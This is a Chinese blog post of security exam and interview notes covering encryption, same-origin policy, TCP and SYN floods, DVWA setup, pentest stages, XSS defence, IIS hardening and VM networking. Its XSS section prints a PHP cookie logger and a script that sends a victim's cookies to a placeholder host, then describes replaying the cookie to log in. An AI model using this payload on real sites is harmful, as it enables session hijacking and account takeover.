筆試題————1、網絡安全、Web安全、滲透測試筆試總結

無意中發現了一個巨牛巨牛的人工智能教程,忍不住分享一下給大家。教程不僅是零基礎,通俗易懂,小白也能學,而且非常風趣幽默,還時不時有內涵段子,像看小說一樣,哈哈~我正在學習中,覺得太牛了,所以分享給大家。點這裏可以跳轉到教程!

本篇文章主要涉及一下幾個方面:


 
  1. 對稱加密非對稱加密?

  2. 什麼是同源策略?

  3. cookie存在哪裏?可以打開嗎

  4. xss如何盜取cookie?

  5. tcp、udp的區別及tcp三次握手,syn攻擊?

  6. 證書要考哪些?

  7. DVWA是如何搭建的?

  8. 滲透測試的流程是什麼

  9. xss如何防禦

  10. IIS服務器應該做哪些方面的保護措施:

  11. 虛擬機的幾種連接方式及原理

  12. xss有cookie一定可以無用戶名密碼登錄嗎?

對稱加密 非對稱加密?

對稱加密:加解密用同一密鑰,密鑰維護複雜 n(n-1)/2,不適合互聯網傳輸密鑰,加解密效率高。應用於加密數據。
非對稱加密:公鑰推不出私鑰,每個用戶一個非對稱密鑰對就可以,適合於互聯網傳輸公鑰,但是加密效率低,應用於數字簽名及加密。

什麼是同源策略?

爲了防止不同域在用戶瀏覽器中彼此干擾,瀏覽器對從不同來源(域)收到的內容進行隔離。
瀏覽器不允許任何舊有腳本訪問一個站點的cookie,否則,會話容易被劫持。

只有發佈cookie的站點能夠訪問這些cookie,只有通過該站點返回的頁面所包含或加載的JavaScript才能訪問cookie。

 

cookie存在哪裏?可以打開嗎

C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Cookies
工具--文件夾選項--查看--將隱藏被保護的文件的對勾去掉就會看到cookies文件夾。

xss如何盜取cookie?

攻擊者代碼:

 


 
  1. <?php

  2. $cookie=$_GET['cookie'];

  3. $time=date('Y-m-d g:i:s');

  4. $referer=getenv('HTTP_REFERER');

  5. $cookietxt=fopen('cookie.txt','a');

  6. fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer.""); 注意雙引號,容易出錯

  7. fclose($cookietxt);

  8. ?>

腳本端:

 


 
  1. <script>

  2. document.write('<img src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');

  3. </script>

獲取到cookie後,用firebug找到cookie,新建cookie
加入cookie,用referer來提交,無需輸入帳號密碼直接登錄進去!

tcp、udp的區別及tcp三次握手,syn攻擊?

一、tcp、udp區別

 

TCP的優點:

可靠,穩定
TCP的可靠體現在TCP在傳遞數據之前,會有三次握手來建立連接,而且在數據傳遞時,有確認、窗口、重傳、擁塞控制機制,在數據傳完後,還會斷開連接用來節約系統資源。
TCP的缺點:

慢,效率低,佔用系統資源高,易被攻擊
TCP在傳遞數據之前,要先建連接,這會消耗時間,而且在數據傳遞時,確認機制、重傳機制、擁塞控制機制等都會消耗大量的時間,而且要在每臺設備上維護所有的傳輸連接,事實上,每個連接都會佔用系統的CPU、內存等硬件資源。
而且,因爲TCP有確認機制、三次握手機制,這些也導致TCP容易被人利用,實現DOS、DDOS、CC等攻擊。

 

 

 

UDP的優點:

快,比TCP稍安全
UDP沒有TCP的握手、確認、窗口、重傳、擁塞控制等機制,UDP是一個無狀態的傳輸協議,所以它在傳遞數據時非常快。沒有TCP的這些機制,UDP較TCP被攻擊者利用的漏洞就要少一些。但UDP也是無法避免攻擊的,比如:UDP Flood攻擊……
UDP的缺點:

不可靠,不穩定
因爲UDP沒有TCP那些可靠的機制,在數據傳遞時,如果網絡質量不好,就會很容易丟包。
基於上面的優缺點,那麼:

什麼時候應該使用TCP:
當對網絡通訊質量有要求的時候,比如:整個數據要準確無誤的傳遞給對方,這往往用於一些要求可靠的應用,比如HTTP、HTTPS、FTP等傳輸文件的協議,POP、SMTP等郵件傳輸的協議。
在日常生活中,常見使用TCP協議的應用如下:

瀏覽器,用的HTTP
FlashFXP,用的FTP
Outlook,用的POP、SMTP
Putty,用的Telnet、SSH
QQ文件傳輸
…………
什麼時候應該使用UDP:
當對網絡通訊質量要求不高的時候,要求網絡通訊速度能儘量的快,這時就可以使用UDP。
比如,日常生活中,常見使用UDP協議的應用如下:

QQ語音
QQ視頻
TFTP


二、TCP握手協議
在TCP/IP協議中,TCP協議提供可靠的連接服務,採用三次握手建立一個連接。
第一次握手:建立連接時,客戶端發送syn包(syn=j)到服務器,並進入SYN_SEND狀態,等待服務器確認;
第二次握手:服務器收到syn包,必須確認客戶的SYN(ack=j+1),同時自己也發送一個SYN包(syn=k),
即SYN+ACK包,此時服務器進入SYN_RECV狀態;
第三次握手:客戶端收到服務器的SYN+ACK包,向服務器發送確認包ACK(ack=k+1),此包發送完畢,
客戶端和服務器進入ESTABLISHED狀態,完成三次握手。

完成三次握手,客戶端與服務器開始傳送數據,在上述過程中,還有一些重要的概念:
未連接隊列:在三次握手協議中,服務器維護一個未連接隊列,該隊列爲每個客戶端的SYN包(syn=j)開設一個條目,
該條目表明服務器已收到SYN包,並向客戶發出確認,正在等待客戶的確認包。這些條目所標識的連接在服務器處於Syn_RECV狀態,
當服務器收到客戶的確認包時,刪除該條目,服務器進入ESTABLISHED狀態。 backlog參數:表示未連接隊列的最大容納數目。
SYN-ACK 重傳次數 服務器發送完SYN-ACK包,如果未收到客戶確認包,服務器進行首次重傳,等待一段時間仍未收到客戶確認包,
進行第二次重傳,如果重傳次數超過系統規定的最大重傳次數,系統將該連接信息從半連接隊列中刪除。注意,每次重傳等待的時間不一定相同。
半連接存活時間:是指半連接隊列的條目存活的最長時間,也即服務從收到SYN包到確認這個報文無效的最長時間,
該時間值是所有重傳請求包的最長等待時間總和。有時我們也稱半連接存活時間爲Timeout時間、SYN_RECV存活時間。


三、SYN攻擊原理
SYN攻擊屬於DOS攻擊的一種,它利用TCP協議缺陷,通過發送大量的半連接請求,耗費CPU和內存資源。
SYN攻擊除了能影響主機外,還可以危害路由器、防火牆等網絡系統,事實上SYN攻擊並不管目標是什麼系統,
只要這些系統打開TCP服務就可以實施。從上圖可看到,服務器接收到連接請求(syn=j),
將此信息加入未連接隊列,併發送請求包給客戶(syn=k,ack=j+1),此時進入SYN_RECV狀態。
當服務器未收到客戶端的確認包時,重發請求包,一直到超時,纔將此條目從未連接隊列刪除。
配合IP欺騙,SYN攻擊能達到很好的效果,通常,客戶端在短時間內僞造大量不存在的IP地址,
向服務器不斷地發送syn包,服務器回覆確認包,並等待客戶的確認,由於源地址是不存在的,
服務器需要不斷的重發直至超時,這些僞造的SYN包將長時間佔用未連接隊列,正常的SYN請求被丟棄,
目標系統運行緩慢,嚴重者引起網絡堵塞甚至系統癱瘓。


證書要考哪些?

信息安全國際第一認證——CISSP
信息安全國內認證——CISAW
信息安全國內認證——CISP
信息安全技術實操認證新貴——Security+
IT審計人員的必備之證——CISA


DVWA是如何搭建的?

啓動xampp(XAMPP(Apache+MySQL+PHP+PERL)是一個功能強大的建站集成軟件包。)下的apache中間件和mysql
將dvwa放到xampp下的htdocs目錄下
在瀏覽器輸入http://127.0.0.1/dvwa 即可使用啦!
還有owasp的漏洞練習平臺:https://sourceforge.net/projects/owaspbwa/files/

 

滲透測試的流程是什麼

滲透測試流程概述
前期交互階段、情報蒐集階段、威脅建模階段、漏洞分析階段、
滲透攻擊階段(Exploitation)、後滲透攻擊階段(怎麼一直控制,維持訪問)、報告階段。

攻擊前:網絡踩點、網絡掃描、網絡查點
攻擊中:利用漏洞信息進行滲透攻擊、獲取權限
攻擊後:後滲透維持攻擊、文件拷貝、木馬植入、痕跡擦除

xss如何防禦

1.對前端輸入做過濾和編碼:
比如只允許輸入指定類型的字符,比如電話號格式,註冊用戶名限制等,輸入檢查需要在服務器端完成,在前端完成的限制是容易繞過的;
對特殊字符進行過濾和轉義;
2.對輸出做過濾和編碼:在變量值輸出到前端的HTML時進行編碼和轉義;
3.給關鍵cookie使用http-only

 

IIS服務器應該做哪些方面的保護措施:

整理來源:http://www.williamlong.info/archives/118.html
1. 保持Windows升級:
2. 使用IIS防範工具
3. 移除缺省的Web站點
4. 如果你並不需要FTP和SMTP服務,請卸載它們
5. 有規則地檢查你的管理員組和服務:
6. 嚴格控制服務器的寫訪問權限
7. 設置複雜的密碼
8. 減少/排除Web服務器上的共享
9. 禁用TCP/IP協議中的NetBIOS:
10. 使用TCP端口阻塞
11. 仔細檢查*.bat和*.exe 文件: 每週搜索一次*.bat
12. 管理IIS目錄安全:
13. 使用NTFS安全:
14. 管理用戶賬戶
15. 審計你的Web服務器:

虛擬機的幾種連接方式及原理

安裝完虛擬機後,默認安裝了兩個虛擬網卡,VMnet1和VMnet8,其他的未安裝(當然也可以手動安裝其他的)。其中VMnet1是host網卡,
用於host方式連接網絡的。VMnet8是NAT網卡,用於NAT方式連接網絡的。它們的IP地址是隨機生成的,如果要用虛擬機做實驗的話,
最好將VMnet1到VMnet8的IP地址改掉。習慣上把VMware虛擬網卡使用的網段"固定",使用如下原則:VMnet1對應的網段是192.168.10.0,

 

 

VMnet2對應的網段是192.168.20.0,其他的類似。當然平常只是隨便用用的就不用改了,能上網就行了。

VMware網絡連接的方式主要有:橋接(Bridged)、NAT、主機網絡(Host-Only)。

1. Use bridged networking(使用橋接網絡)

說明:使用VMnet0虛擬交換機,此時虛擬機相當與網絡上的一臺獨立計算機與主機一樣,擁有一個獨立的IP地址,
其網絡拓撲如圖1所示,使用橋接方式,A,A1,A2,B可互訪。

 

 

 

2. Use network addresstranslation(NAT)

說明:使用Vmnet8虛擬交換機,此時虛擬機可以通過主機單向網絡上的其他工作站,其他工作站不能訪問虛擬機。
其網絡拓撲如圖2所示,使用NAT方式,A1,A2可以訪問B,但B不可以訪問A1,A2。但A,A1,A2可以互訪。

 
3. Use Host-Only networking(使用主機網絡)

說明:使用Vmnet1虛擬交換機,此時虛擬機只能與虛擬機、主機互訪。也就是不能上Internet,其網絡拓撲如圖3所示,
使用Host方式,A,A1,A2可以互訪,但A1,A2不能訪問B,也不能被B訪問。

 

    

xss有cookie一定可以無用戶名密碼登錄嗎?

基本可以。因爲把cookie的值給瀏覽器,瀏覽器去訪問頁面會用已有的cookie去訪問,如果cookie有效,就會直接進去。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章